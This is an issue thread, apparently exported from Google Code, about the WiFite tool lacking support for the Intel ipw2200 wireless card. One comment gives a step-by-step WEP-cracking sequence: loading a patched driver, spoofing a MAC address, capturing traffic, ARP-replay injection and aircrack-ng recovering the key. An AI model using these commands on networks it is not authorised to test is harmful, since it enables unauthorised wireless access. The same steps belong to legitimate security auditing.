Intel 2200 BG (ipw2200) not supported

[GoogleCodeExporter]

What steps will reproduce the problem?
1. python wifite.py
2.
3.

What is the expected output? What do you see instead?
program loops on selection of device to be put in monitor mode

What version of the product are you using? On what operating system?
WiFite r41 on BT4 R1

Please provide any additional information below.
i tried to force monitor mode on eth1 (iwconfig eth1 mode monitor):
the result is: defaulting interface to "" followed by (in red):
program was unable to capture airodump packets!
please make sure...
the program .... and will now exit

Original issue reported on code.google.com by marco.ca...@gmail.com on 27 Sep 2010 at 11:32

[GoogleCodeExporter]

ipw2200 is different than other wireless cards.  The "issue" you encountered is 
not because of Wifite, but because of your hardware and drivers.

I have tried to add support for ipw2200 on GrimWepa and it was a huge waste of 
my time.  Backtrack4 does not work well with ipw2200.  I am going to ask you 
some questions now to save us both some time.

First (and biggest) question: 
*Have you successfully injected packets and cracked a WEP key using the ipw2200 
chipset on backtrack4 R1?*

If your answer is "no" or "I don't know" then wifite is not for you.  Get 
Backtrack2 and follow [http://forum.aircrack-ng.org/index.php?topic=1775.0 the 
guide posted here].  Or you could buy one of the hundreds of other models of 
wireless cards that are compatible with Backtrack 4.  I will not help you any 
further.  Goodbye.

If your answer is "yes" then I need you to tell me *absolutely everything* 
about the attack process.  I want to know every command you type, and the 
output for each command; no expections.  Feel free to email this process to me: 
"derv82 at gmail dot com" since emails are easier to write than comments.

Here's some questions to help guide your email:

Starting monitor mode:
1. How can you tell if you have the ipw2200 chipset? Does airmon-ng say 
'ipw2200' or 'Intel 2200'? What is the name of the device (wlan0, rtap0)?
2. How do you put your device into monitor mode? Do you use airmon-ng, 
iwconfig, or something else? Please tell me the exact commands issued.  
3. What is the name of the device that is put into monitor mode (wlan1, mon0)?  
What is the *entire* output for iwconfig after the device is in monitor mode?
4. Is there anything special you have to do before/after putting your card into 
monitor mode? It would help if you posted *every command* that you type when 
cracking WEP.

WEP attacks:
5. How you do fake-authenticate with the access point? Do you use "aireplay-ng 
-1 ..." or "wpa_supplicant ..." ? What command do you use to fake-authenticate? 
How do you know when you are associated with the access point?
6. What attacks work? I have heard that only "aireplay-ng -3 ..." (arp-request 
replay) injects, and that the other WEP attacks fail. Is this true for your 
card?  Can you test injection using "aireplay-ng -9"? What does it say?

Clean-up:
7. Do you have to run any commands after the attack is complete? Do you put 
your device out of monitor mode? Clean up at all?

Sorry for the block of text, but I refuse to type one line of code for ipw2200 
support until I am certain that it works with Backtrack4.

If the workaround for ipw2200 is too complex or would break the flow of Wifite, 
it will not be supported.

Original comment by der...@gmail.com on 28 Sep 2010 at 6:39

[GoogleCodeExporter]

Agreed: ipw2200 is a complete waste of time, too many people have played with 
getting support working to end in frustration. Quicker and easier to just buy a 
supported miniPCI/USB card...

Original comment by phillips321 on 1 Oct 2010 at 1:43

[GoogleCodeExporter]

I had some time to waste and came up with the patch (sorry, I don't use 
backtrack):
http://trac.pentoo.ch/browser/portage/trunk/net-wireless/compat-wireless/files/i
pw2200-inject.2.6.36.patch

Bellow are basic steps on how to use it:

modprobe ipw2200 rtap_iface=1
iwconfig eth1 essid TestWiFi channel 6 key s:fakekey mode managed
ifconfig eth1 up hw ether 00:11:22:33:44:55
ifconfig rtap0 up

airodump-ng eth1
 - syslog: kernel: device rtap0 entered promiscuous mode
airodump-ng eth1 --channel 6 --bssid 00:01:MACofAP -w dumpfile
 - find WAP protected access point and write down MAC address (MACofAP)
 - notice MAC address of connected client (MACofCLIENT)
aireplay-ng --arpreplay -b 00:01:MACofAP -h 00:02:MACofCLIENT eth1
aircrack-ng -z -b 00:01:MACofAP dumpfile*.cap
 - Opening dumpfile-01.cap
   Attack will be restarted every 5000 captured ivs.
   Starting PTW attack with 15298 ivs.
                         KEY FOUND! [ xxxxxx ] 
   Decrypted correctly: 100%

Feel free to test it and add to wifite.

ps. wifite can be found in pentoo trac too.

Original comment by blshkv on 13 Dec 2010 at 7:08

[GoogleCodeExporter]

great!
how can i test it? have I to download/install the patch or what else? a newer 
release of wifite?
thank you in advance

Original comment by marco.ca...@gmail.com on 13 Dec 2010 at 10:03

[GoogleCodeExporter]

You need to patch/recompile/reload the ipw2200 kernel module, play around with 
aircrack-ng as above (the arpreplay method). You are welcome to test other 
methods (see aircrack-ng docs for details) and provide full answer to the 
comment #2.
Let's hope it will convince developers to support ipw2200 card in the next 
release.

Original comment by blshkv on 13 Dec 2010 at 10:42

[GoogleCodeExporter]

"You need to patch/recompile/reload the ipw2200 kernel module": ok. But how? 
sorry for stupid question... perhaps it's a goal out of my reach...
thanks again

Original comment by marco.ca...@gmail.com on 13 Dec 2010 at 11:06

[GoogleCodeExporter]

https://code.google.com/p/pentoo/source/browse/portage/trunk/net-wireless/compat
-wireless/files/ipw2200-inject.3.4.6.patch

Original comment by blshkv on 15 Aug 2012 at 10:17